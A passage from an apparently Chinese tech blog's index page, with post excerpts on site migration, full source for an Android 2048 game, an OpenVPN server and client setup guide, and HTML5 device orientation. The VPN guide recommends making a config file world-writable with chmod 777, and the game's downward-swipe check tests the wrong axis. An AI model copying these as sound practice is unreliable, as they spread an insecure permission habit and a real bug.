目录已经占用了上百兆，后来打包排除这个目录迁移的。（2）数据库迁移的时候由于 phpMyAdmin 上传大小限制，修改了一番上传大小结果发现没生效，还倒腾了一下 php-fpm，后来发现可以直接上传压缩包，那就分分钟完成了。（3）配置完之后发现网站首页正常访问了，可是其他页面全部出现了 404 错误，后来配置了一番伪静态解析发现配置代码直接写在了 localhost server 里面，后来发现可以直接新写一个 server，然后配置域名 servername，然后配置伪静态重写才成功。总之，坎坷是多，但是，自己慢慢摸索出来，也是一种不错的体验。当你成功之后，会觉得世界又是那么美好。 </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2015-11-13 16:59:27" itemprop="dateCreated datePublished" datetime="2015-11-13T16:59:27+08:00">2015-11-13</time> 阅读次数： 本文字数： 2.5k 阅读时长 ≈ 2 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2200.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> Java </a> <a href="/2200.html" class="post-title-link" itemprop="url">Android开发之2048安卓版</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> 之前是在eclipse上写的，后面换成了android sudio。 2048游戏的UI整体可以采用线性布局，即LinearLayout，其中嵌套一个线性布局和一个GridLayout，内嵌的线性布局填充文本框，以显示分数，GridLayout中填充4x4的继承自FrameLayout的card类作为主要的游戏界面。由于大部分操作都在GridLayout中进行，可以自定义一个继承自GridLayout的类GameView，类中定义判定上下左右滑动的方法和每次滑动后自动添加一个随机数字的方法以及每次滑动后判断游戏是否可以继续进行的方法。主布局activity_main.xml代码如下 <figure class="highlight stylus"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 </pre> </td> <td class="code"> <pre><LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:id="@+id/container" //match_parent表示布局充满整个屏幕 android:layout_width="match_parent" android:layout_height="match_parent" tools:context="com.example.administractor.game2048.MainActivity" //里面的组件垂直放置 android:orientation="vertical" tools:ignore="MergeRootFrame"> <LinearLayout //宽度充满整个屏幕，高度自适应。 android:layout_width="fill_parent" android:layout_height="wrap_content" android:orientation="horizontal" > //显示当前分数的文本框 <TextView android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="Your Score:"/> <TextView android:id="@+id/tvScore" android:layout_width="wrap_content" android:layout_height="wrap_content"/> </LinearLayout> //使用自定义的GridLayout <com.example.administractor.game2048.GameView android:layout_width="fill_parent" android:layout_height="0dp" android:layout_weight="1" android:id="@+id/GameView" > </com.example.administractor.game2048.GameView> </LinearLayout> </pre> </td> </tr> </table> </figure> GameView.java： <figure class="highlight reasonml"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 </pre> </td> <td class="code"> <pre>package com.example.administrator.game2048; import java.util.ArrayList; import java.util.List; import android.app.AlertDialog; import android.content.Context; import android.content.DialogInterface; import android.graphics.Point; import android.util.AttributeSet; import android.view.MotionEvent; import android.view.View; import android.widget.GridLayout; public class GameView extends GridLayout { //调用类构造方法 public GameView(Context context, AttributeSet attrs, int defStyle) { super(context, attrs, defStyle); //初始化游戏 InitGameView(); } public GameView(Context context, AttributeSet attrs) { super(context, attrs); InitGameView(); } public GameView(Context context) { super(context); InitGameView(); } private void InitGameView(){ //设置为4x4个方格 setColumnCount(4); //设置背景颜色 setBackgroundColor(0xffeee4da); //判定滑动方向 setOnTouchListener(new OnTouchListener() { private float startx,starty,offsetx,offsety; @Override public boolean onTouch(View v, MotionEvent event) { switch(event.getAction()){ case MotionEvent.ACTION_DOWN: startx=event.getX(); starty=event.getY(); break; case MotionEvent.ACTION_UP: offsetx=event.getX()-startx; offsety=event.getY()-starty; if(Math.abs(offsetx)>Math.abs(offsety)){ if(offsetx<-5){ swipeLeft(); }else if(offsetx>5){ swipeRight(); } }else{ if(offsety<-5){ swipeUp(); }else if(offsetx>3){ swipeDown(); } } break; } return true; } }); } //适应不同大小的屏幕 @Override protected void onSizeChanged(int w, int h, int oldw, int oldh) { super.onSizeChanged(w, h, oldw, oldh); int cardWidth=(Math.min(h, w))/4; addCards(cardWidth,cardWidth); startGame(); } //在4x4的方格上添加满卡片 public void addCards(int cardwidth,int cardheight){ Card c; for (int y = 0; y < 4; y++) { for (int x = 0; x < 4; x++) { c=new Card(getContext()); c.setNum(0); addView(c, cardwidth, cardheight); cardmap[x][y]=c; } } } //游戏开始时每个卡片默认值设为0，并随机添加两张带数字的卡片 private void startGame(){ MainActivity.getMainActivity().clearScore(); for (int y = 0; y < 4; y++) { for (int x = 0; x < 4; x++) { cardmap[x][y].setNum(0); } } addRandomNum(); addRandomNum(); } private void addRandomNum() { //使用emptypoints将数字为0的card提取出来，并随即选择一个空card赋值 emptyPoints.clear(); for (int y = 0; y < 4; y++) { for (int x = 0; x < 4; x++) { if(cardmap[x][y].getNum()<=0){ emptyPoints.add(new Point(x,y)); } } } Point p=emptyPoints.remove((int)(Math.random()*emptyPoints.size())); //2和4出现的概率控制在1：9 cardmap[p.x][p.y].setNum(Math.random()>0.1?2:4); } //左滑方法 private void swipeLeft(){ //merge作为判断能否滑动的flag boolean merge = false; for (int y = 0; y < 4; y++) { for (int x = 0; x < 4; x++) { for (int x1 = x+1; x1 <4; x1++) { if(cardmap[x1][y].getNum()>0){ if(cardmap[x][y].getNum()<=0){ cardmap[x][y].setNum(cardmap[x1][y].getNum()); cardmap[x1][y].setNum(0); merge=true; x--; }else if(cardmap[x][y].equal(cardmap[x1][y])){ cardmap[x][y].setNum(cardmap[x][y].getNum()*2); cardmap[x1][y].setNum(0); MainActivity.getMainActivity().addScore(cardmap[x][y].getNum()); merge=true; } break; } } } } if(merge){ addRandomNum(); checkComplete(); } } //下滑 private void swipeDown(){ boolean merge = false; for (int x = 0; x < 4; x++) { for (int y = 3; y >=0; y--) { for (int y1 = y-1; y1 >=0; y1--) { if (cardmap[x][y1].getNum()>0) { if (cardmap[x][y].getNum()<=0) { cardmap[x][y].setNum(cardmap[x][y1].getNum()); cardmap[x][y1].setNum(0); y++; merge = true; }else if (cardmap[x][y].equal(cardmap[x][y1])) { cardmap[x][y].setNum(cardmap[x][y].getNum()*2); cardmap[x][y1].setNum(0); MainActivity.getMainActivity().addScore(cardmap[x][y].getNum()); merge = true; } break; } } } } if (merge) { addRandomNum(); checkComplete(); } } //上滑 private void swipeUp(){ boolean merge = false; for (int x = 0; x < 4; x++) { for (int y = 0; y < 4; y++) { for (int y1 = y+1; y1 < 4; y1++) { if (cardmap[x][y1].getNum()>0) { if (cardmap[x][y].getNum()<=0) { cardmap[x][y].setNum(cardmap[x][y1].getNum()); cardmap[x][y1].setNum(0); y--; merge = true; }else if (cardmap[x][y].equal(cardmap[x][y1])) { cardmap[x][y].setNum(cardmap[x][y].getNum()*2); cardmap[x][y1].setNum(0); MainActivity.getMainActivity().addScore(cardmap[x][y].getNum()); merge = true; } break; } } } } if (merge) { addRandomNum(); checkComplete(); } } //右滑 private void swipeRight(){ boolean merge = false; for (int y = 0; y < 4; y++) { for (int x = 3; x >=0; x--) { for (int x1 = x-1; x1 >=0; x1--) { if(cardmap[x1][y].getNum()>0){ if(cardmap[x][y].getNum()<=0){ cardmap[x][y].setNum(cardmap[x1][y].getNum()); cardmap[x1][y].setNum(0); x++; merge=true; }else if(cardmap[x][y].equal(cardmap[x1][y])){ cardmap[x][y].setNum(cardmap[x][y].getNum()*2); cardmap[x1][y].setNum(0); MainActivity.getMainActivity().addScore(cardmap[x][y].getNum()); merge=true; } break; } } } } if(merge){ addRandomNum(); checkComplete(); } } //如果有空卡片或者相邻的值相同卡片则游戏还能进行 public void checkComplete(){ boolean complete=true; ALL: for (int y = 0; y <4; y++) { for (int x = 0; x <4; x++) { if(cardmap[x][y].getNum()==0|| x>0&&cardmap[x][y].equal(cardmap[x-1][y])|| x<3&&cardmap[x][y].equal(cardmap[x+1][y])|| y>0&&cardmap[x][y].equal(cardmap[x][y-1])|| y<3&&cardmap[x][y].equal(cardmap[x][y+1])){ complete=false; break ALL; } } } //游戏结束弹出alert提示窗口 if(complete){ new AlertDialog.Builder(getContext()).setTitle("大林哥温馨提示").setMessage("游戏结束").setPositiveButton("重来",new DialogInterface.OnClickListener() { @Override public void onClick(DialogInterface arg0, int arg1) { startGame(); } }).show(); } } private Card[][] cardmap=new Card[4][4]; private List<Point> emptyPoints=new ArrayList<Point>(); } </pre> </td> </tr> </table> </figure> 主类MainActivity.java： <figure class="highlight java"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 </pre> </td> <td class="code"> <pre>package com.example.administrator.game2048; import android.app.Activity; import android.os.Bundle; import android.widget.TextView; public class MainActivity extends Activity { public MainActivity(){ mainActivity=this; } @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); tvscore = (TextView) findViewById(R.id.tvScore); } public void clearScore(){ score=0; showScore(); } public void showScore(){ tvscore.setText(score+""); } public void addScore(int s){ score+=s; showScore(); } private TextView tvscore; private int score=0; public static MainActivity mainActivity=null; public static MainActivity getMainActivity() { return mainActivity; } } </pre> </td> </tr> </table> </figure> Card.java： <figure class="highlight angelscript"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 </pre> </td> <td class="code"> <pre>package com.example.administrator.game2048; import android.content.Context; import android.view.Gravity; import android.view.View; import android.widget.FrameLayout; import android.widget.TextView; public class Card extends FrameLayout { public Card(Context context) { super(context); LayoutParams lp = null; View background = new View(getContext()); //参数-1表示layoutparams填充满整个父容器 lp = new LayoutParams(-1, -1); //设置卡片之间有10像素的间隔 lp.setMargins(10, 10, 0, 0); background.setBackgroundColor(0x33ffffff); addView(background, lp); label = new TextView(getContext()); label.setTextSize(28); label.setGravity(Gravity.CENTER); lp = new LayoutParams(-1, -1); lp.setMargins(10, 10, 0, 0); addView(label, lp); setNum(0); } private int n=0; public int getNum(){ return n; } //设置数字及对应的背景颜色 public void setNum(int n){ this.n=n; if(n<=0){ label.setText(""); }else{ label.setText(n+""); } switch (n) { case 0: label.setBackgroundColor(0x00000000); break; case 2: label.setBackgroundColor(0xffeee4da); break; case 4: label.setBackgroundColor(0xffede0c8); break; case 8: label.setBackgroundColor(0xfff2b179); break; case 16: label.setBackgroundColor(0xfff59563); break; case 32: label.setBackgroundColor(0xfff67c5f); break; case 64: label.setBackgroundColor(0xfff65e3b); break; case 128: label.setBackgroundColor(0xffedcf72); break; case 256: label.setBackgroundColor(0xffedcc61); break; case 512: label.setBackgroundColor(0xffedc850); break; case 1024: label.setBackgroundColor(0xffedc53f); break; case 2048: label.setBackgroundColor(0xffedc22e); break; default: label.setBackgroundColor(0xff3c3a32); break; } } //判断卡片是否相等 public boolean equal(Card o){ return getNum()==o.getNum(); } private TextView label; } </pre> </td> </tr> </table> </figure> <img src="http://img.blog.csdn.net/20151031225217834?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQv/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center" alt=""> <img src="http://img.blog.csdn.net/20151031225316437?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQv/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center" alt=""> </div> </div> <div class="post-meta"> 作者 <a href="/authors/大龄锅" class="author" itemprop="url" rel="index">大龄锅</a> 发表于 <time title="创建时间：2015-11-07 15:06:58" itemprop="dateCreated datePublished" datetime="2015-11-07T15:06:58+08:00">2015-11-07</time> 阅读次数： 本文字数： 10k 阅读时长 ≈ 9 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2188.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> Net </a> <a href="/2188.html" class="post-title-link" itemprop="url">计算机网络探究三之搭建并连接VPN服务器</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> <h2 id="openvpn-原理"><a href="#openvpn-原理" class="headerlink" title="openvpn 原理"></a>openvpn 原理</h2> VPN 直译就是虚拟专用通道，是提供给企业之间或者个人与公司之间安全数据传输的隧道，OpenVPN 无疑是 Linux 下开源 VPN 的先锋，提供了良好的性能和友好的用户 GUI。它大量使用了 OpenSSL 加密库中的 SSLv3/TLSv1 协议函数库。目前 OpenVPN 能在 Solaris、Linux、OpenBSD、FreeBSD、NetBSD、Mac OS X 与 Microsoft Windows 以及 Android 和 iOS 上运行，并包含了许多安全性的功能。它并不是一个基于 Web 的 VPN 软件，也不与 IPsec 及其他 VPN 软件包兼容。 openvpn 通过使用公开密钥（非对称密钥，加密解密使用不同的 key，一个称为 Publice key，另外一个是 Private key）对数据进行加密的。这种方式称为 TLS 加密。 openvpn 使用 TLS 加密的工作过程是，首先 VPN Sevrver 端和 VPN Client 端要有相同的 CA 证书，双方通过交换证书验证双方的合法性，用于决定是否建立 VPN 连接。然后使用对方的 CA 证书，把自己目前使用的数据加密方法加密后发送给对方，由于使用的是对方 CA 证书加密，所以只有对方 CA 证书对应的 Private key 才能解密该数据，这样就保证了此密钥的安全性，并且此密钥是定期改变的，对于窃听者来说，可能还没有破解出此密钥，VPN 通信双方可能就已经更换密钥了。扩展阅读： <a href="http://baike.baidu.com/link?url=ssl8SkkfVHTcjm9UCzJ8AsJOhIHMYcxuIisO4pqyqaZF6llwP1r0fgLvYEmAg_zYhFWauFzfEyXmEmFcaprG2K" target="_blank" rel="noopener">openvpn</a> <h2 id="安装-openvpn"><a href="#安装-openvpn" class="headerlink" title="安装 openvpn"></a>安装 openvpn</h2> 首先，你需要有一台长期运行的服务器，大家可以用自己的闲置的电脑或者买一台阿里云啦。我的服务器是 Ubuntu 14.04，下面就演示一下我的配置过程。安装 <figure class="highlight q"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo apt-get -y install openvpn libssl-dev openssl </pre> </td> </tr> </table> </figure> 查看下版本并记录下来 <figure class="highlight ada"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>openvpn --version </pre> </td> </tr> </table> </figure> <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030145358.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030145358.jpg" alt="20151030145358"></a> 在这里我们的版本是 2.3.2 <h2 id="安装-easy-rsa"><a href="#安装-easy-rsa" class="headerlink" title="安装 easy-rsa"></a>安装 easy-rsa</h2> easy-rsa 是用来制作 openvpn 相关证书的，使用如下命令安装 <figure class="highlight routeros"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo apt-get -y install easy-rsa </pre> </td> </tr> </table> </figure> 好，一切准备就绪后，我们就开始制作证书啦，我们需要制作的有三个证书 CA 证书、Server 端证书、Client 端证书。行动起来。 <h2 id="制作-CA-证书"><a href="#制作-CA-证书" class="headerlink" title="制作 CA 证书"></a>制作 CA 证书</h2> openvpn 与 easy-rsa 安装完毕后，我们需要在/etc/openvpn/目录下创建 easy-rsa 文件夹，如下 <figure class="highlight awk"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo mkdir /etc/openvpn/easy-rsa/ </pre> </td> </tr> </table> </figure> 然后把/usr/share/easy-rsa/目录下的所有文件全部复制到/etc/openvpn/easy-rsa/下 <figure class="highlight awk"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo cp -r /usr/share/easy-rsa/* /etc/openvpn/easy-rsa/ </pre> </td> </tr> </table> </figure> 当然，我们也可以直接在/usr/share/easy-rsa/制作相关的证书，但是为了后续的管理证书的方便，我们还是把 easy-rsa 放在了 openvpn 的启动目录下。 注意：由于我们现在使用的是 ubuntu 系统，所以我们必须切换到 root 用户下才能制作相关证书，否则 easy-rsa 会报错。如果是 centos 系统，则不存在此问题。 切换到 root 用户下，使用如下命令： <figure class="highlight ebnf"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo su </pre> </td> </tr> </table> </figure> 在开始制作 CA 证书之前，我们还需要编辑 vars 文件，修改如下相关选项内容即可 <figure class="highlight awk"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo vi /etc/openvpn/easy-rsa/vars </pre> </td> </tr> </table> </figure> <figure class="highlight routeros"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 6 7 </pre> </td> <td class="code"> <pre>export KEY_COUNTRY="CN" export KEY_PROVINCE="SD" export KEY_CITY="JiNan" export KEY_ORG="germy" export KEY_EMAIL="cqc@cuiqingcai.com" export KEY_OU="germy" export KEY_NAME="germy" </pre> </td> </tr> </table> </figure> 如图所示 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030150125.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030150125.jpg" alt="20151030150125"></a> 之后，我们需要利用这个文件来制作我们的证书，保存一下。然后一个很重要的一步，赋予权限，否则在制作证书的时候，值还是初始化的值。 <figure class="highlight awk"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo chmod 777 /etc/openvpn/easy-rsa/vars </pre> </td> </tr> </table> </figure> vars 文件主要用于设置证书的相关组织信息，红色部分的内容可以根据自己的实际情况自行修改。其中 export KEY_NAME=”germy” 这个要记住下，我们下面在制作 Server 端证书时，会使用到。 注意：以上内容，我们也可以使用系统默认的，也就是说不进行修改也是可以使用的。 然后使用 source vars 命令使其生效，如下： <figure class="highlight vim"> <table> <tr> <td class="gutter"> <pre>1 2 </pre> </td> <td class="code"> <pre>source vars ./clean-all </pre> </td> </tr> </table> </figure> 注意：执行 clean-all 命令会删除，当前目录下的 keys 文件夹。现在开始正式制作 CA 证书，使用如下命令： <figure class="highlight jboss-cli"> <table> <tr> <td class="gutter"> <pre>1 2 </pre> </td> <td class="code"> <pre>cd /etc/openvpn/easy-rsa/ ./build-ca </pre> </td> </tr> </table> </figure> 一路回车即可。制作完成后，我们可以查看 keys 目录里有什么东西。如果你的目录下出现了 ca.crt 和 ca.key 两个文件，其中 ca.crt 就是我们所说的 CA 证书。如此，CA 证书制作完毕。现在把该 CA 证书的 ca.crt 文件复制到 openvpn 的启动目录/etc/openvpn 下，如下： <figure class="highlight vim"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>cp keys/ca.crt /etc/openvpn/ </pre> </td> </tr> </table> </figure> <h2 id="制作-Server-端证书"><a href="#制作-Server-端证书" class="headerlink" title="制作 Server 端证书"></a>制作 Server 端证书</h2> CA 证书制作完成后，我们现在开始制作 Server 端证书。如下： <figure class="highlight n1ql"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>./build-key-server germy </pre> </td> </tr> </table> </figure> 上述命令中 germy，就是我们前面 vars 文件中设置的 KEY_NAME 查看 keys 目录 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030150704.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030150704.jpg" alt="20151030150704"></a> 如果可以发现出现了 germy.crt，germy.csr，germy.key 文件，就说明成功了。现在再为服务器生成加密交换时的 Diffie-Hellman 文件，如下： <figure class="highlight jboss-cli"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>./build-dh </pre> </td> </tr> </table> </figure> 你会发现目录下多了一个 dh2048.pem 文件。以上操作完毕后，把 germy.crt，germy.key，dh2048.pem 复制到 /etc/openvpn/ 目录下，如下： <figure class="highlight awk"> <table> <tr> <td class="gutter"> <pre>1 2 </pre> </td> <td class="code"> <pre>cd /etc/openvpn/easy-rsa/ cp keys/germy.crt keys/germy.key keys/dh2048.pem /etc/openvpn/ </pre> </td> </tr> </table> </figure> 如此，Server 端证书就制作完毕。 <h2 id="制作-Client-端证书"><a href="#制作-Client-端证书" class="headerlink" title="制作 Client 端证书"></a>制作 Client 端证书</h2> Server 端证书制作完成后，我们现在开始制作 Client 端证书，如下： <figure class="highlight n1ql"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>./build-key cqc </pre> </td> </tr> </table> </figure> 其中上述命令的 cqc 就是客户端证书名称，可以自定义如果发现 keys 目录已经生成了 cqc.csr、cqc.crt 和 cqc.key 这个三个文件。其中 cqc.crt 和 cqc.key 两个文件是我们要使用的。如此，Client 端证书就制作完毕。 <h2 id="配置-Server-端"><a href="#配置-Server-端" class="headerlink" title="配置 Server 端"></a>配置 Server 端</h2> 所有证书制作完毕后，我们现在开始配置 Server 端。Server 端的配置文件，我们可以从 openvpn 自带的模版中进行复制。如下： <figure class="highlight awk"> <table> <tr> <td class="gutter"> <pre>1 2 </pre> </td> <td class="code"> <pre>cp /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz /etc/openvpn/ cd /etc/openvpn/ </pre> </td> </tr> </table> </figure> 解压 server.conf.gz 文件，使用如下命令： <figure class="highlight css"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>gzip -d server.conf.gz </pre> </td> </tr> </table> </figure> 注意：上述命令的意思是解压 server.conf.gz 文件后，然后删除原文件。现在我们来修改 server.conf 文件 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030151728.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030151728.jpg" alt="20151030151728"></a> 一共要修改 3 处文件（1）修改了 openvpn 运行时使用的协议，由原来的 UDP 协议修改为 TCP 协议。生成环境建议使用 TCP 协议。（2）修改了 openvpn 服务器的相关证书，由原来的 server.csr、server.key 修改为 germy.crt、germy.key。（3）修改了 Diffie-Hellman 文件，由原来的 dh1024.pem 修改为 dh2048.pem。配置文件修改完毕后，我们现在来启动 openvpn，使用如下命令： <figure class="highlight awk"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>/etc/init.d/openvpn start </pre> </td> </tr> </table> </figure> 至此，服务器端的 VPN 已经配置完毕了。 <h2 id="客户端的配置"><a href="#客户端的配置" class="headerlink" title="客户端的配置"></a>客户端的配置</h2> 服务器端配置好了，我们需要用另一台机器来连接，这里我们的客户端依然是 Ubuntu 14.04 首先我们需要从服务器上取到刚才生成的证书文件，那么我们需要的有什么呢？ <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030152200.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030152200.jpg" alt="20151030152200"></a> 首先这三个，ca.crt，cqc.crt，cqc.key 另外是一个模板，它是 /usr/share/doc/openvpn/examples/sample-config-files/client.conf 把这四个文件下载下来，然后放到客户端里。比如我们保存到客户机的 home/user 文件夹下 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030152421.jpg" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/10/20151030152421.jpg" alt="20151030152421"></a> 把 client.conf 文件重命名为 client.ovpn 然后修改下面 4 处 <figure class="highlight css"> <table> <tr> <td class="gutter"> <pre>1 2 3 4 5 </pre> </td> <td class="code"> <pre>proto tcp remote 121.42.14.158 1194 ca ca.crt cert cqc.crt key cqc.key </pre> </td> </tr> </table> </figure> 其中 remote 就是你的服务器地址配置好了之后，我们运行 <figure class="highlight ada"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo openvpn --config client.ovpn </pre> </td> </tr> </table> </figure> 如果最后的结果是 Sequence Completed 那就证明连接成功啦。输入 <figure class="highlight ebnf"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>ifconfig </pre> </td> </tr> </table> </figure> 你会发现多了一个 tun0 适配器，这就是 openvpn 的适配器。至此，openvpn 的配置和连接就全部完成啦。 <h2 id="参考来源"><a href="#参考来源" class="headerlink" title="参考来源"></a>参考来源</h2> <a href="http://www.myhack58.com/Article/sort099/sort0102/2015/65155_4.htm" target="_blank" rel="noopener">参考文献</a> 如有问题，欢迎留言交流。 </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2015-10-30 15:33:28" itemprop="dateCreated datePublished" datetime="2015-10-30T15:33:28+08:00">2015-10-30</time> 阅读次数： 本文字数： 3.7k 阅读时长 ≈ 3 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2185.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> HTML </a> <a href="/2185.html" class="post-title-link" itemprop="url">HTML5中Device Orientation的特性</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> HTML5中包含一个帮助检测device orientation的特性，使用这个特性可以在移动设备浏览器中判断用户设备的旋转重力方向。 <h2 id="基本知识"><a href="#基本知识" class="headerlink" title="基本知识"></a>基本知识</h2> Alpha, Beta, Gamma角度旋转。当用户旋转手机的时候，HTML5中定义了三个轴方向的旋转，如下： <a href="http://www.gbtags.com/gb/networks/uploadimg/48ca06d6-fef5-4c18-9379-a49b6b9db3af.png" target="_blank" rel="noopener"><img src="http://www.gbtags.com/gb/networks/uploadimgthumb/48ca06d6-fef5-4c18-9379-a49b6b9db3af.png" alt=""></a> 上图可以看考，分别是z，x，y轴，对应分别是：Alpha，Beta，Gamma，下面图将更清楚的展示： <a href="http://www.gbtags.com/gb/networks/uploadimg/13a73e08-da9a-47a0-be1d-9d8dea6c2f98.png" target="_blank" rel="noopener"><img src="http://www.gbtags.com/gb/networks/uploadimgthumb/13a73e08-da9a-47a0-be1d-9d8dea6c2f98.png" alt=""></a> 上图是Alpha旋转，　围绕Z轴旋转（绿线旋转方向，水平） <img src="http://www.gbtags.com/gb/networks/uploadimgthumb/3803a433-29b7-48e8-8abe-b9c48270047c.png" alt=""> 上图是Beta旋转，　围绕X轴旋转（绿线旋转方向，前后） <img src="http://www.gbtags.com/gb/networks/uploadimgthumb/cbb478f5-4490-48f1-af44-0b9e73844057.png" alt=""> 上图是Beta旋转，　围绕Y轴旋转（绿线旋转方向，左右） <h2 id="属性"><a href="#属性" class="headerlink" title="属性"></a>属性</h2> <ul> <li>alpha: (float 类型 )以z方向为轴心的旋转角度浮点数类型，只读属性，取值范围为0到360（不等于360）。</li> <li>beta: (float 类型 )以x方向为轴心的旋转角度浮点数类型，只读属性，取值范围为-180到180（不等于180）。</li> <li>gamma: (float 类型 )以y方向为轴心的旋转角度浮点数类型，只读属性，取值范围为-180到180（不等于180）。</li> </ul> <h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2> <a 